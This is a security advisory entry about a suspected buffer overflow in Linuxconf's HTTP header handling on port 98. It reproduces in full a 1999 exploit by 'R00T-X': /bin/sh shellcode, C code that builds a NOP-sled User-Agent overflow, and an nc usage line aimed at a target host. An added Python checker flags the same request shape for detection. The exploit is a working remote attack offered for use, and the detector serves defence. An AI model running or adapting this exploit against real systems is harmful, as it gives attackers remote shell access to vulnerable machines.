COMMAND

    linuxconf

SYSTEMS AFFECTED

    Linux

PROBLEM

    Elias Levy posted the following.  There may exist a buffer overflow
    vulnerability in the Linuxconf package shipped with some versions of
    Linux systems.  The vulnerability may be in the program's handling of
    HTTP headers.  Initial testing with Linuxconf 1.16r10 under RedHat 6.0
    was inconclusive.  If others can test the exploit and report their
    results it would be appreciated.

    This is an example of what good can happen from sharing security
    incident information.  There have been reports on the INCIDENTS
    mailing list for several months now of scans for port 98.  Since no
    publicly known major vulnerabilities existed in this service, the
    traffic was somewhat strange.  After some digging around, Jon Starnaud
    was able to find this exploit.

    /*
    
      linuxconf exploit by R00T-X (c) 1999
    
      USER_AGENT overflow x86
      should work on all linux's but you need to have
      network access to linuxconf
    
      greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P
    
      have fun with this but for EDUCATIONAL PURPOSES :)
    
      Usage:   (./linexp <offset>;cat)| nc targethost 98
    
     */
    
    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh\x00";
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <limits.h>
    #include <string.h>
    
    #define BUFLEN 1025
    #define NOP 0x90
    
    void
    main (int argc, char *argv[])
    {
      char buf[BUFLEN];
      int offset,nop,i;
      unsigned long esp;
      char shell[1024+300];
    
      if(argc < 2)
      {
      fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);
      exit(0);
      }
    
      nop = 511;
      esp = 0xefbfd5e8;
      offset = atoi(argv[1]);
    
      memset(buf, NOP, BUFLEN);
      memcpy(buf+(long)nop, shell, strlen(shell));
    
      for (i = 256; i < BUFLEN - 3; i += 2)
      {
        *((int *) &buf[i]) = esp + (long) offset;
        shell[ sizeof(shell)-1 ] = 0;
      }
    
     printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);
      for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    
      printf("\r\n");
    
      return;
    }
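    Detection example added here (not part of the original posting or of
    Linuxconf): a small checker that inspects a raw request captured on port
    98 and flags the shape the listing above emits, namely an oversized
    header line, a run of x86 NOP bytes (0x90), a header line with no colon,
    and the User-agent name folded onto the Content-Length line.  The 512
    byte threshold and both sample requests are constructed for this example.

```python
import re

MAX_HEADER_LEN = 512                 # constructed threshold; real User-Agents are far shorter
NOP_RUN = re.compile(rb"\x90{16,}")  # 16 or more consecutive x86 NOPs looks like a sled


def check_request(raw: bytes) -> list[str]:
    """Return the reasons a raw HTTP request looks like the linuxconf
    User-Agent overflow; an empty list means nothing suspicious was found."""
    head = raw.split(b"\r\n\r\n", 1)[0]          # headers only, ignore any body
    lines = head.split(b"\r\n")
    reasons = []
    for n, line in enumerate(lines[1:], start=1):  # skip the request line
        if not line:
            continue
        if len(line) > MAX_HEADER_LEN:
            reasons.append(f"line {n}: {len(line)}-byte header line")
        if NOP_RUN.search(line):
            reasons.append(f"line {n}: run of x86 NOP bytes (0x90)")
        if b":" not in line:
            reasons.append(f"line {n}: header line without ':'")
    # The published exploit sends "Content-Length: N, User-agent: " as one line.
    for line in lines[1:]:
        low = line.lower()
        if low.startswith(b"content-length") and b"user-agent" in low:
            reasons.append("User-agent folded onto the Content-Length line")
    return reasons


# Constructed sample: an ordinary request to the linuxconf web front end.
BENIGN = (b"GET / HTTP/1.0\r\nHost: linuxconf.example\r\n"
          b"User-Agent: Mozilla/4.0 (compatible)\r\n\r\n")

# Constructed sample mirroring the request shape of the listing above
# (1025-byte second line), with an ASCII placeholder instead of shellcode.
MALICIOUS = (b"POST / HTTP/1.0\r\nContent-Length: 1025, User-agent: \r\n"
             + b"\x90" * 600 + b"<payload-placeholder>" + b"\x90" * 404 + b"\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, check_request(req) or "clean")
```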

SOLUTION

    Nothing yet.